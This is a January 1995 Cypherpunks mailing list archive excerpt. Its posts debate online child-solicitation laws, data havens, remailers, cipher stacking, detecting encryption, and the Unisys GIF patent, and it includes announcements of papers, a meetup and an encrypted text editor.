>able to punish people who do it (hence the felony) and to educate Well, in reality you still can catch them, after all no one can sexually assault anyone over the internet (yet, anyway). Mmmm, being the parent of two children, I have to disagree. The brain is the primary sexual organ, after all. Sometime they've got to do something in person, and there's no encryption in a physical meeting, where everyone sees your TrueFace. But I'm not sure how much I trust the gubmint types to take this all into account, instead of just abolishing crypto on the typical four horsemen platform. Hey, I don't trust the gubmint either, that's why I called Bob to get an explanation. I really *don't* think that New York State plans to ban encryption, not now and not over this issue anyway. His thrust is 1) to have the legal authority to sufficiently punish someone who goes after children (which they don't have now), and 2) to educate guardians about the risks of untoward communications from adults to children. - -- - -russ http://www.crynwr.com/crynwr/nelson.html Crynwr Software | Crynwr Software sells packet driver support | ask4 PGP key 11 Grant St. | +1 315 268 1925 (9201 FAX) | What is thee doing about it? Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress? -----BEGIN PGP SIGNATURE----- Version: 2.7 iQCVAwUBLxV4bKbBSWSDlCdBAQETDgQAjTHvEkdBxIHvHFOWZjZwCy0V1EIVkImc t0HcB1Zwm6YdHpHNHl8EZbFn7EVIR3ctv17Y52YhS8Ilsdux0m8dFPCmVIWEGVDT pcZWFL3a4SB+pOcCeAL3frqhYS6+wACEfJbMgHPKv3QLwiej905GpC0qM1uwkX4x D75Pf20F/nY= =xHOc -----END PGP SIGNATURE----- From mark at unicorn.com Thu Jan 12 10:52:56 1995 From: mark at unicorn.com (Mark Grant) Date: Thu, 12 Jan 95 10:52:56 PST Subject: Reefer madness Message-ID: On Thu, 12 Jan 1995, Russell Nelson wrote: > I really *don't* think that New York State plans to > ban encryption, not now and not over this issue anyway. His thrust is > 1) to have the legal authority to sufficiently punish someone who goes > after children (which they don't have now), and 2) to educate guardians > about the risks of untoward communications from adults to children. But what happens if, say, a minor is solicited for sex when they are pretending to be older than they are ? Or if the solicitation comes via a remailer ? Or a minor with a grudge fakes email to show that someone attempted to get them to agree to sex/picture-taking or whatever ? Once you pass laws making some forms of communication illegal, you're immediately getting into dodgy territory requiring is-a-person credentials and so on. That isn't neccesarily a problem if it's voluntary (e.g. your kids accounts might be set up to only accept mail from people who're certified to be under 18 or whatever), but governments are unlikely to do things that way. Mark From lmccarth at thor.cs.umass.edu Thu Jan 12 11:48:08 1995 From: lmccarth at thor.cs.umass.edu (L. McCarthy) Date: Thu, 12 Jan 95 11:48:08 PST Subject: Chain and Shifting Remailer Addresses Message-ID: <199501121953.OAA26211@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Offshore Assets writes: > I use Hal Finney's 'Chain' a lot: Uh, I think you probably mean Lance Cottrell, not Hal -- unless Hal's also written a similar utility with an identical name, about which I haven't heard. > [...] But it won't PGP correctly with the Usura > and the Flame remailers because these two have e-mail addresses that > have changed and/or are different from the addresses specified in their > public keys (Usura, for instance, is now , but this > is not the address given in its public key ID). Alex de Joode posted a copy of the usura key edited to reflect the domain name change to alt.privacy.anon-server. It's presumably on the keyservers.... Oh, and the flame remailer passed away with the closure of the jpunix remailer, as far as I can tell. (I vaguely recall something to the effect that sinet.org is/was registered as a subdomain of jpunix.com, but I might well be wrong.) Hope this helps. -L. Futplex McCarthy - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLxWIfyoZzwIn1bdtAQHcYwF/alAsviWQvyzf4Qg1JR+G0l1sP3o6AGZN xvaxIZsKhhX03RNogflWZPBah3y8DnCa =aVDR -----END PGP SIGNATURE----- From fhalper at pilot.njin.net Thu Jan 12 12:20:02 1995 From: fhalper at pilot.njin.net (Frederic Halper) Date: Thu, 12 Jan 95 12:20:02 PST Subject: Reefer madness Message-ID: <9501122019.AA14798@pilot.njin.net> mark at unicorn.com wrote: But what happens if, say, a minor is solicited for sex when they are pretending to be older than they are ? Or if the solicitation comes via a remailer ? Or a minor with a grudge fakes email to show that someone attempted to get them to agree to sex/picture-taking or whatever ? Once you pass laws making some forms of communication illegal, you're immediately getting into dodgy territory requiring is-a-person credentials and so on. That isn't neccesarily a problem if it's voluntary (e.g. your kids accounts might be set up to only accept mail from people who're certified to be under 18 or whatever), but governments are unlikely to do things that way. Any person no matter their age should be wary if someone solicits them for sex. I'm 16 years old and have been on the Internet for a little more than a year and I haven't nor have I met anyone who has been approached by a pedophile. The examples used are isolated incidents, which could have likely been prevented had they discussed it with their parents or tried to obtain more info about the person they were going to meet. -RH --------------------------------------------------------------------------------- Reuben Halper I'm not growing up, I'm just burnin' out." Montclair High - Green Day - Montclair, NJ E-mail: fhalper at pilot.njin.net PGP 2.6ui Public Key available upon request --------------------------------------------------------------------------------- From sandfort at crl.com Thu Jan 12 12:56:41 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Thu, 12 Jan 95 12:56:41 PST Subject: Reefer madness In-Reply-To: <9501122019.AA14798@pilot.njin.net> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, On Thu, 12 Jan 1995, Reuben Halper (or his dad, Frederic, posing as a kid) wrote: > . . . > I'm 16 years old and have been on the Internet for a little > more than a year and I haven't nor have I met anyone who has > been approached by a pedophile. . . Ever seen a Turkish prison film, Reuben? S a n d y With apologies to Peter Graves. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From unicorn at access.digex.net Thu Jan 12 13:03:28 1995 From: unicorn at access.digex.net (Black Unicorn) Date: Thu, 12 Jan 95 13:03:28 PST Subject: Data Havens..A consumer perspective In-Reply-To: Message-ID: On Thu, 12 Jan 1995, Censored Girls Anonymous wrote: > Date: Thu, 12 Jan 1995 02:32:06 -0600 (CST) > From: Censored Girls Anonymous > To: cypherpunks at toad.com > Subject: Data Havens..A consumer perspective > > > 1. You have what I want or need. As far as what...? Data already in the haven? Storage capacity? Speed of link? > 2. In order for me to let you store it, I will give it to you > anyway you wish to get it. Does this include on old style magnetic reel to reel? Clearly there has to be some simplicity of submission. I would further submit than many "consumers" will not want to store plaintext data, and thus "any way you wish to get it." quickly becomes unacceptable. > 3. I will let you do anything to the data you wish, so long as I > get it back intact. Again, does this include storing it in a /pub/ dir on an ftp site in plaintext? No, there must be a clear stated policy of the site operator's method of storage. > 4. It is no concern (only idle curiosity maybe) where the data is parked. This ignores jurisdictional concerns that may have significant, even severe impact. > 5. I would expect to pay money for the safekeeping of my data. What kind of money? Digital postage? New currency? DM? $? This toois s is a simplistic representation of the real concern. > 6. I would expect the longer you hold the data, the more it will cost. I assume you mean day to day cost, not rates by data age? Though this brings up a interesting point, what would be the incentives served and created by charging on a phase in scale? i.e., what would be the result if a DH were to charge $ .05 a day for data that had been in the DH for over a month, and $ .09 a day for data over a year? It would at the very least, increase traffic as old data was taken out and put back in to avoid the steped up "latency" charge. If all the data was encrypted, would this help deter traffic analysis by imposing "productless" transactions resulting in no net change in the DH's holdings? Hmmmmm. > 7. The only thing I am counting on is the data's timely retrieval. And not its ability to be directed to specific parties, rather than the public at large? And not its ability to avoid traffic analysis? And not its ability to be multi or non-jurisdictonal? > 8. Welcome to the world of data "coatchecking". I've lost several coats this way. > Why make it more complex than this? Why insist on this simplicity. Why not store it on your own machine if these are your only requirements? > From the moment the data leaves their hands, until I return it, > they have no right, nor I no obligation, to divulge anything about it. > For they already would know, it would take a few minutes to retrieve it. This was to be from a consumers's prespective I thought. In any event, this ignores the possibility of court ordered disclosure, availability to third and fourth parties, and traffic analysis concerns. > For whether it's encrypted to the nth degree, or parked in a plain brown > wrapper in a massive unix box somewhere, as long as I the haven manager, > return the data in a safe, timely, uncorrupted manner, I've done my duty. What you are talking about has little if anything to do with "Data Havens" you're just selling storage space. > Carol Anne 073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est 6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa - wichtig! From mark at unicorn.com Thu Jan 12 13:12:58 1995 From: mark at unicorn.com (Mark Grant) Date: Thu, 12 Jan 95 13:12:58 PST Subject: Reefer madness In-Reply-To: <9501122019.AA14798@pilot.njin.net> Message-ID: On Thu, 12 Jan 1995, Frederic Halper wrote: > Any person no matter their age should be wary if someone solicits them > for sex. I agree, however it does seem to be a bit much for a horny geek who propositions a supposed 21-year old who turns out to be 14 to be sent to jail and forever marked as an EVIL PEDOPHILE, rather than just being told to get a life. Particularly if, say, the girl in question was posting to alt.sex.wanted or something. But the main point I was trying to make here is that with laws like this proof of age would be required in both directions. Of course, a system that stamped each users age on outgoing messages could well lead to more real-world abuse by the real crazies, not less... Mark From dean at hi.com Thu Jan 12 14:12:56 1995 From: dean at hi.com (Dean Anderson) Date: Thu, 12 Jan 95 14:12:56 PST Subject: LPF Statement on the GIF controversy Message-ID: <9501092348.AA28210@loki.hi.com> [ Please repost this wherever you think is appropriate! ] Until now, most computer professionals and companies have ignored the problem of software patents. The GIF format for graphical images was adopted widely on the net, despite the Unisys patent covering the LZW data compression algorithm. The patent dates to 1985, but its enforcement has been carried out with private threats; most victims are afraid to talk about it. Now the patent has shown its teeth. For a few days, the Internet community was shaking with anger at the surprise demand to pay license fees for the use of GIF format. It turns out that the license being offered today is only for Compuserve users. Compuserve accepted an offer from Unisys that they couldn't refuse. Compuserve users can accept this offer now, or face Unisys later on their own. The rest of us don't have a choice--we get to face Unisys when they decide it's our turn. So much trouble from just one software patent. There are now over ten thousand software patents in the US, and several thousand more are issued each year. Each one may be owned by, or could be bought by, a grasping company whose lawyers carefully plan to attack people at their most vulnerable moments. Of course, they couch the threat as a "reasonable offer" to save you miserable years in court. "Divide and conquer" is the watchword: pursue one group at a time, while advising the rest of us to relax because we are in no danger today. Software patents may not seem like an urgent problem until you find one aimed at you. We all have other fires to fight, and most developers have hoped that the patents would never blaze up. In an ironic way, Unisys has done us a favor--by showing that the problem is too serious to ignore. What people first feared, could just as well have happened. Each of the thousands of software patents has the potential to devastate a segment of the community, both software developers and users. There will be more nasty surprises. They are part of a system. Unisys has given us a chance to work together to change the system--rather than waiting to be sued one by one for this patent or that. We can win the fight against software patents, if we speak loud and clear against them. What can people do? * Express your disapproval to Unisys by writing a letter to its CEO. Tell him what you think of his company's actions: James Unruh CEO UNISYS Corp. PO Box 500 Blue Bell, PA 19424 fax: 215-986-6850 Please use snail mail--a physical pile of letters is more impressive, psychologically, than a big file of email. Keep it short--ten lines is enough. Don't spend hours composing your letter; there's no need. But do write it in your own words, because sending a form letter written by someone else is not impressive. Make it clear that the usual excuses--"We're just exercising our property rights; look how reasonable we are being (compared to what we _could_ have done)"--won't wash with you. Avoid saying anything nasty that would give Unisys a chance to paint itself as the victim. Cold condemnation is more powerful than flames. Please email a copy of your letter to the League for Programming Freedom at gif-letters at lpf.org. We might ask you for permission to publish your letter. * Don't sign a license--stop using GIF. The World Wide Web consortium at MIT will probably be coordinating the move away from GIF, and offering advice and assistance. See `http://www.w3.org/'. * Join the League for Programming Freedom. The League is a membership-based organization whose aim is to bring back the freedom to write software. The League says that no one should be able to dictate what kinds of programs you can write. You can contact the LPF by email to lpf at uunet.uu.net, or look at its Web pages at `http://www.lpf.org/'. ** Note: the recent license demand came in the name of Compuserve; but the impetus for it came from Unisys. Compuserve developed the GIF format many years ago, not knowing there was a patent on LZW. (Most programmers have no idea what patents their programs are vulnerable to--there are too many patents to keep track of.) When Unisys threatened to sue them, Compuserve had to give in to Unisys's demands. Compuserve arranged to be allowed to offer Compuserve users a sublicense, but the "offer" was formulated in a way that was tantamount to an ultimatum. Compuserve may bear responsibility for some of the details of how this was handled, but the main responsibility falls on Unisys. It is Unisys that claims the power to dictate what kinds of software you can write. Unisys decided to use the power for aggression; Unisys forced Compuserve to participate. =++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++==++=+=+=+++= Dean Anderson Dean at hi.com President League for Programming Freedom From blancw at microsoft.com Thu Jan 12 14:28:47 1995 From: blancw at microsoft.com (Blanc Weber) Date: Thu, 12 Jan 95 14:28:47 PST Subject: Reefer madness Message-ID: <9501122229.AA13951@netmail2.microsoft.com> From: Sandy Sandfort Ever seen a Turkish prison film, Reuben? ......................................................... I don't get it. (I haven't seen one) Blanc From pdlamb at iquest.com Thu Jan 12 14:32:59 1995 From: pdlamb at iquest.com (Patrick Lamb) Date: Thu, 12 Jan 95 14:32:59 PST Subject: Multiple symetric cyphers Message-ID: <199501122232.QAA04830@vespucci.iquest.com> >In article <199501120502.VAA29808 at largo.remailer.net>, >Eric Hughes wrote: >> From: cactus at seabsd.hks.net (L. Todd Masco) (bunch of stuff deleted) >> I guess this reduces to: do strong cyphers have "signatures" of some sort, >> by which the type of encryption can be derived? >> >>If they do, they're likely not _strong_ ciphers. > >Great... that's the answer I was looking for, and what my gut feeling >was. I'm trying to determine how much rope is too much for a first pass. > >Related: is there, in general or in any known specific cases, any loss of >security in using sym. cipher A on ciphertext B (of another sym. cipher) with >the same key? With different keys (I would think not, but I vaguely >remember mention of something here long ago)? Is this asking the question, "Does DES form a group with IDEA?" (Substitute your favorite cipher.) Since it took about 15 years to figure out DES is _not_ a group, I suspect it will take a long time to figure out the answer to that question for each pair of ciphers you're going to substitute. Seems to me it's a good basic idea. If it costs, for example, a million bucks to crack a cipher; you have three ciphers that can be used; then the best-case cost to crack a message just tripled! Of course, if you choose two ciphers stronger than DES, it probably went up a little more (g). If the ciphers don't form a group, you just made your system unbreakable. Just use two ciphers. Then a brute-force attacker has to check each key for each cipher once when it is applied first, and once for each of the possible keys for the other cipher when it is applied second! Sounds too good to be true. Am I missing something? Pat From daleh at ix.netcom.com Thu Jan 12 14:34:47 1995 From: daleh at ix.netcom.com (Dale Harrison AEGIS) Date: Thu, 12 Jan 95 14:34:47 PST Subject: How do I know if its encrypted? Message-ID: <199501122233.OAA02325@ix3.ix.netcom.com> You wrote: >You don't always need the correct answer. You just need the correct >answer most of the time. You're trying to create a presumption about >behavior. Ensuring that you can't read almost all of the traffic is a >pretty good way to assure people that you don't try to make sense of >any of it. I'm still not making my point. Encryption is not a data 'state' that can be tested for in the way that liquid/solid/vapour are states of matter. Encryption is a data 'interpretation' for which there are an arbitrairly large number of interpretations available for any given dataset. There is no algorithmic test that can applied to a dataset that will be able to establish the existance or non-existance of a given interpretation. If you're given an unkown dataset and are asked the question, 'Is this an image file' or 'Is this an encrypted file' or 'Is this an audio clip', there is no algorithmic test that can answer any of these questions in either the affermative or the negative. This is just an alternate phrasing of Goedel's Undecidability Theorem. This problem lies permanantly outside the outer boundary of algorithmic capability. Let me now spin a little tale as to how this affects an operator of a re-mailer or datahaven. This tale has two characters, Paco the child pornogropher and Eric the honest RM/DH operater. Paco begins by inventing the new 'Foolproof Barometric Graphic Image Format' (aka FooBar GIF) of which only Paco knows the internals. A FooBar GIF has a statistical profile that looks remarkably like a PGP file, in fact it even comes with a PGP header! Nothing illegal here. Now Paco writes a FooBar GIF Viewer which he sales to child-porn types. Again, there's nothing illegal about the sale of such a piece of software. Paco now anonymously loads Eric's DH with lots of child-porn FooBar GIF's via Eric's anon-RM. These files of course sail right through Eric's filters with nary a scratch. As far as Eric knows he's holding PGP encrypt files. Now Paco advertises the availability of lots of 'good' picture on Eric's DH that can be used with the newly purchased FooBar GIF Viewers. Then the cops get ahold of one of Paco's FooBar GIF Viewers and downloads some FooBar GIFs from Eric's DH and the last words we ever hear from Eric are "I swear I thought they were PGP files, I swear to God I thought they were....." as the authorities drag his carcass off to jail. Whose going to believe Eric's protests of innocence? "After all", says the prosecutor to the jury, "wasn't Eric explicitly filtering out what he didn't want in. If fact", says the prosecutor, "his filter seems to have been designed specifically to allow these kiddie-porn files in and to reject all others." A sad end indeed! Dale H. From grmorgan at freenet.vcu.edu Thu Jan 12 14:46:08 1995 From: grmorgan at freenet.vcu.edu (Greg Morgan) Date: Thu, 12 Jan 95 14:46:08 PST Subject: Multiple symetric cyphers Message-ID: <9501122245.AA18097@freenet.vcu.edu> > >> But selecting a single cipher is just as much a fixed policy as a >> randomly selected one is. Far better to let the user pick a policy, >> both about sent and accepted ciphers. > >If you do give the user control, what is an acceptable mechanical >implementation? Let's say I have a file encryptor which allows the >user to choose between DES, 3DES, IDEA, Diamond, and RC5. Must I >require the user to tell that program what cypher was used to encrypt >the file she wishes to decrypt? > >Is storing the cypher type as part of the encrypted file a weakness? Perhaps an MD5 of the password could be encrypted along with the plaintext using the method(s) of choice. At the decryption phase, the password would be MD5 hashed again and the block of bytes the size of an MD5 hash would be "decrypted" with each of the methods... which ever one matches the original MD5 hash would be used to decrypt the rest of the cyphertext. This method wouldn't leave a known plaintext in the file to attack. -- ----------------------------------------------------------------------------- Greg Morgan | "I dunno Brain, me and Pipi From pcassidy at world.std.com Thu Jan 12 14:48:31 1995 From: pcassidy at world.std.com (Peter F Cassidy) Date: Thu, 12 Jan 95 14:48:31 PST Subject: Reefer madness In-Reply-To: <9501122229.AA13951@netmail2.microsoft.com> Message-ID: Who are the big public key registeries out there now? just got a call that the USPS is developing its own public key registry. Is this news to you guys? From eric at remailer.net Thu Jan 12 14:54:26 1995 From: eric at remailer.net (Eric Hughes) Date: Thu, 12 Jan 95 14:54:26 PST Subject: How do I know if its encrypted? In-Reply-To: <199501121701.JAA24309@jobe.shell.portal.com> Message-ID: <199501122252.OAA01584@largo.remailer.net> From: Hal The idea of offsite storage doesn't seem that helpful since you can just store the data on your own disk in encrypted form. I'll tell you one really useful facility for offsite storage, and that's private key backup. Use a secret sharing arrangement, say 5 out of 7 reconstruction, and send out 7 chunks. Now, give a different pointer-to-chunk to each of 7 different people. In the case of catastrophe, you can recover your key. Too paranoid not to let your key out of your sight? Then don't do this. Here's another use. I'd like to interlock offsite backup with my digital money withdrawals, so that my money is always backed up. Let's be clear; the code that dfloyd at io.com is working on is offsite storage in a reasonably secure form. It's not a data haven. Eric From rah at shipwright.com Thu Jan 12 15:30:08 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 12 Jan 95 15:30:08 PST Subject: Microsoft TrueName (tm) (fwd) Message-ID: At 11:23 AM 1/12/95, NetSurfer wrote: >I wondered why one of the few registered hosts for Microsoft were called >"Bob" - now it makes sense. (But they've got a good sized chunk of >netblks registered...) Funny thing happened to me last night. I was talking to a guy who had seen Fidelity's new WWW server (shhh! don't tell!) and it turns out he was the guy who actually *had* bob.com. A third party approached him and asked him if he wanted to sell the domain name. He did. He picked another domain name, and last week someone called him if he wanted to sell his *new* domain name. He said no, and they asked him if he would *rent* it to them... Go figure. Cheers, Bob Hettinga Eric, what'll you take for "remailer.net"? ;-). ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From rah at shipwright.com Thu Jan 12 15:30:13 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 12 Jan 95 15:30:13 PST Subject: Available: Cash paper by anonymous FTP Message-ID: >From: brands at cwi.nl >Original-From: Stefan.Brands at cwi.nl >Subject: Available: Cash paper by anonymous FTP >To: www-buyinfo at allegra.att.com >Date: Thu, 12 Jan 1995 18:57:39 +0100 (MET) >Mime-Version: 1.0 >Status: U > > > I have made available for ftp-retrieval my paper > > "Off-Line Electronic Cash Based on Secret-Key certificates." > > This paper will be presented at the Second International Symposium of > Latin American Theoretical Informatics (LATIN '95), April 3-7, 1995. > > If you are interested in downloading a copy, login by anonymous ftp at > > ftp.cwi.nl > > The paper is in the directory pub/brands, under the name > "latin95.." The extension refers to dvi and PostScript > formats. > > Greetings > > Stefan Brands, > ------------------------------------------------------ > CWI, Kruislaan 413, 1098 SJ Amsterdam, The Netherlands > Tel: +31 20 5924103, e-mail: brands at cwi.nl > > ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From rah at shipwright.com Thu Jan 12 15:31:19 1995 From: rah at shipwright.com (Robert Hettinga) Date: Thu, 12 Jan 95 15:31:19 PST Subject: Paper on NetCheque and requirements of network payment services Message-ID: >From: bcn at ISI.EDU >Date: Thu, 12 Jan 1995 11:11:49 -0800 >Posted-Date: Thu, 12 Jan 1995 11:11:49 -0800 >Original-From: Clifford Neuman >To: www-buyinfo at allegra.att.com >Subject: Paper on NetCheque and requirements of network payment services >Status: U > >There is a new paper available on NetCheque(TM) and requirement of >network payment services. The paper will be presented at IEEE Compcon >in March. The paper can be retrieved from prospero.isi.edu in > >/pub/netcheque/information/netcheque-requirements-compcon95.ps.Z. > >Clifford Neuman ----------------- Robert Hettinga (rah at shipwright.com) "There is no difference between someone Shipwright Development Corporation who eats too little and sees Heaven and 44 Farquhar Street someone who drinks too much and sees Boston, MA 02331 USA snakes." -- Bertrand Russell (617) 323-7923 From claborne at microcosm.sandiegoca.ATTGIS.COM Thu Jan 12 15:45:39 1995 From: claborne at microcosm.sandiegoca.ATTGIS.COM (Claborne, Chris) Date: Thu, 12 Jan 95 15:45:39 PST Subject: San Diego CPunks Symposium Message-ID: <2F158E27@microcosm.SanDiegoCA.ATTGIS.COM> CPUNKS symposium Thursday, Jan 26, 1995 Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop" were I hope to get an update of weasel man's new anonymous e-mail server, "mixmaster", exchange keys, and generally shoot the shit. Don't forget to bring your public key fingerprint. If you can figure out how to get it on the back of a business card, that would be cool. Place: The Mission Cafe & Coffee Shop 488-9060 3795 Mission Bl in Mission Beach. Time:1800 Their Directions: 8 west to Mission Beach Ingram Exit Take west mission bay drive Go right on Mission Blvd. On the corner of San Jose and mission blvd. It is located between roller coaster and garnett. It's kind of 40s looking building... funky looking (their description, not mine) I will be wearing a BRIGHT PURPLE BICYCLING JACKET. Try to be their by 18:30 since we may move the meeting. See you there! Weasel man, don't forget to bring the latest info on mixmaster. Fish man, sweep the place for bugs. Anarchist, the FBI has already setup surveillance. Law man, bring the logo and your e-mail address of the month :) New guy, bring your fingerprint. NOTE: My e-mail address, "chris.claborne at sandiegoca.attgis.com" permanently replaces my .ncr.com address. Both address work for now but NCR address will eventually be killed. 2 -- C -- P.S. Tell your wife/husband you are going to a symposium. Unless she/he looks in the dictionary, she/he won't know that your are really going to a drinking party! ... __o .. -\<, chris.claborne at sandiegoca.attgis.com ...(*)/(*). CI$: 76340.2422 PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. From tjb at acpub.duke.edu Thu Jan 12 16:11:42 1995 From: tjb at acpub.duke.edu (Tom Bryce) Date: Thu, 12 Jan 95 16:11:42 PST Subject: RELEASE: Secure Edit beta 0.5 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- RELEASE: secure edit beta 0.5 for Macintosh Miyako Software has released an improved version of secure edit. It is now available for FTP from ripem.msu.edu in the directory pub/crypt/mac, and at other ITAR-compliant sites. Finger tjbryce at amherst.edu for an updated site list, as well as information on other products by miyako software. All releases are signed with the Miyako Software public PGP key. Version b0.5 sports the following new features: FOR EASE OF USE AND UTILITY: * extensive balloon help * an undo command * print command * a find command (useful for storing sensitive information with secure edit) * windows menu with tile and stack commands * copy with line breaks inserted, for composing email or pgp messages * much better and faster compression and a smaller base file size * secure edit now uses Colin Plumb's fast 68k assembly IDEA implementation * you can turn off the annoying � marks * the menu blinking clunky has been fixed * the window update annoyance has been fixed * various interface clunkies have been fixed * new and more intuitive icons have been drawn FOR SECURITY: * much better random number management using the code written by Colin Plumb for PGP * random data is snarfed from all events the application observes (such as your keystrokes), the time these events occur, and by continuously tracking your mouse position, even when backgrounded. the pool of random data is maintained between sessions and is encrypted based on these random events before it is written to disk and before use. * so that every file is encrypted on a different IDEA key, making cryptanalysis of one useless agaist others, your key is salted with 128 bits of random data, stored in the clear for decryption, to make a 'session key'. thus, the key used to encrypt every file will be different, even if you used the same passphrase. this makes cryptanalysis of one file useless against others. * the salt is concatenated with MD5[passphrase] many times and this concatenated string hashed to generate the 'session key' for the file from your pass phrase. The number of times it is concatenated is calibrated to make it take about half a second - not a big performance loss, but it makes brute force attack of weak passphrases up to thousands of times more costly. * semi-splay compression is utilized, which is faster than the lame old compression (written by me :( ) and which gets >50% file reduction. It strengthens the encryption by reducing the redundancy in the plaintext. It also continually modifies the compression encoding system based on the data as it goes along, making the interpretation of compressed data dependent on the data that has come before it * you can verify keys against Curve Encrypt keyfiles * documents that are saved in plaintext format clearly distinguished by "TEXT:" in the window title * the source code has been cleaned up :-) and much improved to make it easier to verify yourself that the program is strong and secure. ------THE BASICS------ (from version a 0.3.4) SECURE EDIT is an editor designed for editing sensitive text buffers. It is designed to prevent plaintext from ever being written to disk, even if only momentarily. You might fail to overwrite or encrypt such plaintext properly, or your opponent might be able to retrieve some of the information even though you wiped it (see docs for details). Word Processors generally create temp and scratch files that leave plaintext on your drive whether you like it or not. Secure edit fixes this problem. Sometimes you need to quit in a hurry and have all your data encrypted and saved. Or you might prefer to have your files encrypted at all times so that you never forget to re-encrypt a file you worked on, and so that files are never in plaintext form while you are working with them. Secure edit sports the following features to serve these and other data security needs: * Plaintext is never written to disk - Secure Edit locks all sensitive buffers in memory so that virtual memory will never swap them to disk. This includes the text you are editing as well as any encryption keys in use. * Secure Edit never creates plaintext temp or scratch files * Secure Edit offers the option of saving files directly in encrypted format so you never have plaintext on the hard drive. * Your data is compressed and encrypted in RAM with the IDEA algorithm, then written to disk in encrypted format. * Secure Edit can mantain a secure, private clipboard, interconverting with the system clipboard only when you use OPTION-cut,copy, and paste. This prevents the system from getting a copy of your sensitive data and possibly writing it to disk, or leaving it around for another user to see. * Secure Edit can open foreign text files, and DOD wipe them on request when you save the file in encrypted format. * Secure Edit offers a default passphrase option so you only need to enter your passphrase once. It also offers the option of validating your phrase against secure validation information that can be used to check that you have entered your standard pass phrase, but which cannot be used to recover the passphrase. This prevents you from saving under a bad passphrase and losing data. * Secure Edit offers a time-out option, whereby it will save all files and quit after a certain idle time period * Secure Edit offers an option-quit feature, whereby it will assume it is okay to save all files, and save and quit as quickly as possible * Secure Edit is available to U.S. citizens in the U.S. at an ITAR-compliant site near you. I'm presently uploading it to ripem.msu.edu and others. * source code is, of course, available. * Questions about Secure Edit should be directed to me, at Thanks for your attention. Tom Bryce /////////////////////////////_\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ *---------------------------------------------------------* Miyako Software is dedicated to creating freeware to help make computers tools of personal liberation and expression. for product info and PGP key, finger email: *---------------------------------------------------------* \\\\\\\\\\\\\\\\\\\\\\\\\\\\\_///////////////////////////// -----BEGIN PGP SIGNATURE----- Version: 2.6 iQCVAwUBLxN4F08YjrUhOUC5AQGueAQAkJNvwUO5QVZd9FQnfwm2HnKiFH/DvAUQ 2TWkrqhRJ2R06Ht98Vrw/ixacQLP9GEobKlK1WDdQE/lNZGre2IgLS0lXm39F1ll A0wSIpRrJ5wK2KlWEbq1e5cuaooA/+Y2C6U7RAQbj+/wF9/9FqKvzmLAzYgx2pqD VxDCzkn2A4s= =d0DX -----END PGP SIGNATURE----- ------------------------------------------------------------------------ /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/~~\ | Tom Bryce |____| ___ | Duke Med | ___ {~._.~} | tjb at acpub.duke.edu | {~._.~) ( Y ) | PGP keys: finger tjbryce at amherst.edu | ( Y ) ()~*~() |personal:9B6088464ED86413 0F5E55E45CF1C961| ()~*~() (_)-(_) |miyako | (_)-(_) |software:02646F0B06DCFE03 E6DD367DB4E1010F| /~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~/ | \_________________________________________\__/ From yusuf921 at uidaho.edu Thu Jan 12 17:11:04 1995 From: yusuf921 at uidaho.edu (Syed Yusuf) Date: Thu, 12 Jan 95 17:11:04 PST Subject: FBI and BLACKNET In-Reply-To: Message-ID: On Wed, 11 Jan 1995, Samuel Kaplin wrote: > I hope they took you someplace nice for lunch...You might want to file a > FOI request on yourself, just to see how much they censor. ;) They might > think you're the ringleader, after all the FBI doesn't buy peons lunch. ;) > For the benifit of myself and the list, how would you go about doing that? > Sam > skaplin at skypoint.com | Finger skaplin at infinity.c2.org for > E-mail key at four11.com for PGP Key or | "...vidi vici veni" - Overheard > Finger skaplin at mirage.skypoint.com | outside a Roman brothel. > A man wrapped up in himself makes a very small package. --Syed From Ben.Goren at asu.edu Thu Jan 12 17:17:50 1995 From: Ben.Goren at asu.edu (Ben.Goren at asu.edu) Date: Thu, 12 Jan 95 17:17:50 PST Subject: How do I know if its encrypted? Message-ID: Here's a solution: Alice sends a file to Dave's DataHaven. When Alice wants her file back, she sends to Dave a secure hash of the file, a key with which to decrypt it, and a handful of plaintext at the beginning of the file. Dave decrypts the file that matches the hash with the key Alice gave him; if the file begins as Alice says it should, Dave returns the file to Alice. This way, only those people who have an intimate knowledge of the files can recover them. The hash isn't vital; Dave could try to decrypt each file on the server with the key Alice gives him until he matches the plaintext--but that's neither elegant nor friendly to the CPU. People can send Dave whatever kind of file they like, but they'll only get it back if it's been encrypted properly. If Dave charges to store a file, he'll gladly welcome as much spammage as people want to send him. If he likewise charges to return a file, he'll just as glady send a file to whoever gives him the cash and can identify it. Dave can have a policy whereby he deletes a file after returning it, unless Alice pays more to keep it there. Thus, Bad Bobby can send his naughty pictures to Dave, tell the 'net how to get them--but the first person who neglects to include the fee to leave the pictures there winds up blocking out everybody else. Similarly, Samaritan Sam could get into a spending war with Bobby. Each time Bobby sends 